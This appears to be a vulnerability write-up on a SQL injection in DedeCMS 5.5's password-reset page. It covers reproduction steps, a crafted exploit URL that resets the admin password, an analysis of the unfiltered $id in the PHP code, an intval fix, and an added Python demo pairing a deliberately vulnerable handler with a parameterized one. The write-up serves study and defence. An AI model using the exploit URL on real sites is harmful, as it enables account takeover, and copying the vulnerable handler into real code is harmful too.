catalog
1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Code analysis
5. Defense
6. Offense/defense reflections
1. Vulnerability description
A SQL injection vulnerability in DEDEcms allows an attacker to change any user's password.
2. Trigger conditions
1. Register a user.
2. Use "retrieve password" and choose retrieval via the security question: http://localhost/dedecms5.5/member/resetpassword.php
3. Fill in the information and click confirm.
4. Click confirm again; you are redirected to a URL of this form: http://localhost/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=2&key=zPnruOY7
// An attacker can then construct an exploit such as:
http://127.0.0.1/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=xx' or userid='admin' and '2&key=zPnruOY7&setp=2&pwd=111222&pwdok=111222
// Replace the 2 in the URL above with the id parameter from the earlier redirect link, and replace key with that link's key parameter
// userid can be changed to the user whose password is to be reset: admin
// pwd and pwdok are the new password and must be identical: md5(111222)=00b7691d86d96aebd21dd9e138f90840
Password changed successfully
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2010-042167
3. Affected scope
4. Code analysis
/member/resetpassword.php
..
elseif($dopost == "getpasswd")
{
    // change password
    if(empty($id))
    {
        ShowMsg("对不起,请不要非法提交","login.php");
        exit();
    }
    // Only the digits of $id are kept for the lookup
    $mid = ereg_replace("[^0-9]","",$id);
    $row = $db->GetOne("Select * From #@__pwd_tmp where mid = '$mid'");
    if(empty($row))
    {
        ShowMsg("对不起,请不要非法提交","login.php");
        exit();
    }
    if(empty($setp))
    {
        $tptim= (60*60*24*3);
        $dtime = time();
        if($dtime - $tptim > $row['mailtime'])
        {
            $db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';");
            ShowMsg("对不起,临时密码修改期限已过期","login.php");
            exit();
        }
        require_once(dirname(__FILE__)."/templets/resetpassword2.htm");
    }
    // The attack PoC enters this branch
    elseif($setp == 2)
    {
        if(isset($key))
        {
            $pwdtmp = $key;
        }
        $sn = md5(trim($pwdtmp));
        if($row['pwd'] == $sn)
        {
            if($pwd != "")
            {
                if($pwd == $pwdok)
                {
                    $pwdok = md5($pwdok);
                    $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';";
                    $db->executenonequery($sql);
                    // $id is placed in the SQL statement without any filtering, causing an injection in the UPDATE
                    $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';";
                    if($db->executenonequery($sql))
..
5. Defense
/member/resetpassword.php
/* Normalize the $id variable */
$id = isset($id) ? intval($id) : 0;
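The root cause in section 4 is that the value checked (the digits-only $mid used to look up the reset token) is not the value acted on (the raw $id interpolated into the UPDATE). The following Python model, added here and not part of the original post or of DedeCMS, reproduces that control flow against an in-memory SQLite stand-in for the two tables (constructed rows, table prefix dropped, column names taken from the snippet above) and places it next to a hardened handler. The hardened version applies the intval normalization from section 5 and additionally binds every value as a query parameter, which goes beyond the page's one-line fix; the assumption that the original DB helper does not abort on a failed DELETE is mine.

```python
import hashlib
import re
import sqlite3

# Constructed test fixture: one admin, one ordinary member with a pending reset.
RESET_TOKEN = "constructed-token"          # stands in for the key= value
TOKEN_HASH = hashlib.md5(RESET_TOKEN.encode()).hexdigest()


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE member  (mid INTEGER, userid TEXT, pwd TEXT);
        CREATE TABLE pwd_tmp (mid INTEGER, pwd TEXT);
        INSERT INTO member  VALUES (1, 'admin', 'adminhash');
        INSERT INTO member  VALUES (2, 'alice', 'alicehash');
        INSERT INTO pwd_tmp VALUES (2, '{TOKEN_HASH}');
    """)
    return db


def reset_vulnerable(db, id_param, key, pwd, pwdok):
    """Mirror of the original flow: digits-only copy for the token lookup,
    raw string interpolated into DELETE and UPDATE. Returns rows updated."""
    mid = re.sub(r"[^0-9]", "", id_param)           # ereg_replace("[^0-9]","",$id)
    row = db.execute(f"SELECT pwd FROM pwd_tmp WHERE mid = '{mid}'").fetchone()
    if row is None or row[0] != hashlib.md5(key.strip().encode()).hexdigest():
        return 0
    if pwd == "" or pwd != pwdok:
        return 0
    new_hash = hashlib.md5(pwdok.encode()).hexdigest()
    try:
        db.execute(f"DELETE FROM pwd_tmp WHERE mid = '{id_param}'")
    except sqlite3.Error:
        pass  # assumption: the original helper logs and continues on a failed statement
    cur = db.execute(f"UPDATE member SET pwd = '{new_hash}' WHERE mid = '{id_param}'")
    return cur.rowcount


def php_intval(s):
    """Approximation of PHP intval() on a string: leading integer or 0."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def reset_fixed(db, id_param, key, pwd, pwdok):
    """Hardened flow: one normalized integer id used for both the check and
    the write, and all values bound as parameters."""
    mid = php_intval(id_param)                      # $id = isset($id) ? intval($id) : 0;
    row = db.execute("SELECT pwd FROM pwd_tmp WHERE mid = ?", (mid,)).fetchone()
    if row is None or row[0] != hashlib.md5(key.strip().encode()).hexdigest():
        return 0
    if pwd == "" or pwd != pwdok:
        return 0
    new_hash = hashlib.md5(pwdok.encode()).hexdigest()
    db.execute("DELETE FROM pwd_tmp WHERE mid = ?", (mid,))
    cur = db.execute("UPDATE member SET pwd = ? WHERE mid = ?", (new_hash, mid))
    return cur.rowcount


def password_of(db, userid):
    return db.execute("SELECT pwd FROM member WHERE userid = ?", (userid,)).fetchone()[0]


if __name__ == "__main__":
    crafted = "xx' or userid='admin' and '2"        # the id shape from section 2
    db = make_db()
    print("vulnerable rows changed:", reset_vulnerable(db, crafted, RESET_TOKEN, "111222", "111222"))
    print("admin pwd afterwards:", password_of(db, "admin"))
    db = make_db()
    print("fixed rows changed:", reset_fixed(db, crafted, RESET_TOKEN, "111222", "111222"))
    print("admin pwd afterwards:", password_of(db, "admin"))
```

Running it shows why the digits-only filter gives a false sense of safety: the lookup on $mid succeeds for a legitimate token, so the handler proceeds, and only then does the unfiltered $id reach the UPDATE WHERE clause. In the hardened handler the same integer is used end to end, so a non-numeric id normalizes to 0, finds no pending reset, and the request is rejected before any write.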
6. Offense/defense reflections
Copyright (c) 2015 LittleHann All rights reserved